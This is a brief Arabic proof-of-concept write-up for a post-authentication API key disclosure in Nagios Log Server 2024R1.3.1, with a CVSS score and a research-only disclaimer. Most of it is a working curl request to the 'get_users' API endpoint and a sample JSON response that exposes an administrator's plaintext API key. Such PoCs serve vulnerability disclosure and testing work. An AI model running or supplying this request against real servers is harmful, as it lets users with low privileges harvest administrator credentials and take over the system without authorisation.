
كشف مفتاح API بعد المصادقة في Nagios Log Server 2024R1.3.1
▶️ عرض توضيحي لإثبات المفهوم (PoC)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Hلأغراض البحث والاختبار المصرَّح به فقط. يُرجى عدم استخدامه ضد الأنظمة دون إذن.
ثغرة أمنية على مستوى API في Nagios Log Server 2024R1.3.1 تتيح لأي مستخدم يمتلك رمز API صالحًا استرجاع قائمة كاملة بحسابات المستخدمين إلى جانب مفاتيح API الخاصة بهم كنص واضح، بما في ذلك بيانات اعتماد المسؤول. تُمكِّن هذه الثغرة من تعداد المستخدمين، وتصعيد الامتيازات، والاختراق الكامل للنظام عبر الاستخدام غير المصرَّح به للرموز المكشوفة.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]